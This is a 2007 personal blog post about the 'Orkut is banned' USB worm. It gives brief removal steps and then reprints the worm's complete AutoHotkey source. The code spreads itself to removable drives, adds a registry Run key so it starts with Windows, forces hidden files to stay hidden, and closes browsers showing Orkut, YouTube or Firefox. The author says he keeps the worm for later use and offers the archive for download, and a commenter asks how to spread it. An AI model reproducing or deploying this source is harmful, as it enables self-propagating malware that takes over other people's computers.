Me and My Muse

Thursday, July 19, 2007

Orkut is banned you fool - Virus Update

A sudden laugh hit me last afternoon which said, "ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!" Same was the case with YouTube.

A mindless chukle told me its just another innovation from a budding pop-hungry genius, but the rice is the severe spread. How could it have come to me, pretty nasty.. anywayz ..

So heres the gig:
> 1. Go to the Task manager
> 2. click on the "Application" Tab ( if its not )
> 3. Right Click on the application that's Giving you the Messge > go
> the Process.
> 4 as you can see there is "svchost.exe" Highlighted.
> 5. Right Click and Select "End Process Tree"

I loitered a bit and found a new directory in my C: drive
Directory - C:\heap41a
Files - svchost.exe, drivelist.txt, 2.mp3, Icon.ico, offspring, reproduce.txt, std.txt, script1.txt

To make it more interesting the kid had made the folder invisible even when we choose to see all hidden files.

I choose to show the script much to the comfort of the writer ...
"You are good kid, real good, but as long as I am around, you will always be second best"
- Stanley Ipkiss


offspring:
    #notrayicon
    #persistent
    ArrayCount = 0
    Loop, Read,C:\heap41a\driveList.txt
    {
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
    }
    dat1=%userprofile%
    settimer,reproduce,5000
    return

    reproduce:

    Loop %ArrayCount%
    {

    element := Array%A_Index%
    driveget,data,Type,%element%:\
    ifequal,data,Removable
    {
    driveget,data1,status,%element%:\
    ifequal,data1,Ready
    {
    FileCopydir,C:\heap41a\offspring,%element%:\,1

    }

    }
    }
    regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
    ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
    Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
    return

script:
    #persistent
    #notrayicon
    settimer,ban,2000
    return

    WinGetActiveTitle, ed
    ifinstring,ed,orkut
    {
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ifinstring,ed,youtube
    {
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ifinstring,ed,Mozilla Firefox
    {
    winclose %ed%
    msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
    return
    }
    ifwinactive ahk_class IEFrame
    {

    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,orkut
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,orkut
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,orkut
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,orkut
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,youtube
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,youtube
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,youtube
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,youtube
    {
    winclose ahk_class IEFrame
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
    }

    }
    return

std:
    #notrayicon
    #singleinstance,ignore
    regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
    ifnotequal,regdata,0
    regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
    Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
    Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

drivelist:
    c
    d
    e
    f
    g
    h
    i
    j
    k
    l
    m
    n
    o
    p
    q
    r
    s
    t
    u
    v
    w
    x
    y
    z


The rest of the files are junk, just delete it to break free (or if you are like me, rar and preserve it, for later use. It installs easily :P)

Download the rar from here (just for info)


-Arnab
http://arnabpal.blogspot.com/

Labels:

2 Comments:

Blogger chanky said...

thnx for the info

Monday, September 03, 2007 3:16:00 PM  
Anonymous Anonymous said...

hi i tried that muhaaa virus. but its not working. how we can send it by uploading on website? plz let me know. kiranraj.kevin@gmail.com

Saturday, April 11, 2009 7:38:00 PM  

Post a Comment

<< Home